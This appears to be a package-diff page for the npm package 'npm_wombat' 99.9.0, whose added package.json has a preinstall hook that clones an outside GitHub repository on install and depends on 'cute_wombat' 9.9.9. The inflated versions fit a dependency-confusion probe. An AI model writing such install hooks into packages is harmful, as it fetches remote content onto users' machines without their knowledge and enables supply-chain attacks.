npm_wombat 99.9.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +10 -0
package/package.json ADDED
@@ -0,0 +1,10 @@
1
+ {
2
+ "name": "npm_wombat",
3
+ "version": "99.9.0",
4
+ "scripts": {
5
+ "preinstall": "git clone https://github.com/pingjuu/BLOOMFUZZ.git"
6
+ },
7
+ "dependencies": {
8
+ "cute_wombat": "9.9.9"
9
+ }
10
+ }